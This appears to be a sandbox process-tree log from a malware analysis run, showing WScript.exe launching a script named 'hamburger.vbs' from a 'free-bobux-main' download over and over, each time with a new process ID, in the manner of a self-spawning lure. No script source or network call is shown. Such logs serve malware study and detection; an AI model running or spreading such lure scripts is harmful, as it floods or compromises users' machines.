C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15284
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15324
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5608
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7008
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5832
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15380
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15400
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15480
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15516
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15576
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15596
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15620
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15668
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15692
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15728
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15800
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15824
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15864
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15892
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15928
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15960
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:15996
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16052
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16068
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16104
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16160
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16204
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16240
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16268
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16348
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16376
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7104
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:376
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:5264
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:4352
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16452
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16472
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16484
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16524
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16568
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16612
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16664
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16708
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16748
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16808
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16824
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16872
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16900
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16928
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:16976
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17016
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17036
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17080
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17100
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17124
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17148
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17184
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17240
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17272
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17300
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17336
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17372
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17400
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7480
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7672
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:7960
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17460
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17484
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17524
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17560
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17592
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17640
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17676
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17728
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17756
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17780
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17832
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17864
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17912
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17948
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:17980
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18028
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18060
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18116
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18160
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18180
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18212
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18236
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18276
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18316
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18352
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18388
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8028
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:1804
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:872
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8484
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:8580
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18440
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18464
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18508
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18536
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18572
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18664
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18692
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18736
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18768
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18800
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18832
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18872
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18900
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18924
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:18988
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19024
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19068
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19092
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19128
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19152
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19184
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19256
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19288
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19324
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19352
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19396
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19420
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:4152
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9164
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9240
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9424
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9664
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19472
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19512
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19568
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19592
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19624
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19652
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19688
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19720
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19736
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19788
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19848
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19888
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19912
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19956
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:19984
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20028
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20064
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20092
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20124
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20172
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20208
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20268
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20296
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20320
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20352
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20396
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:20420
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:9948
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10160
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"4⤵PID:10292
-
-
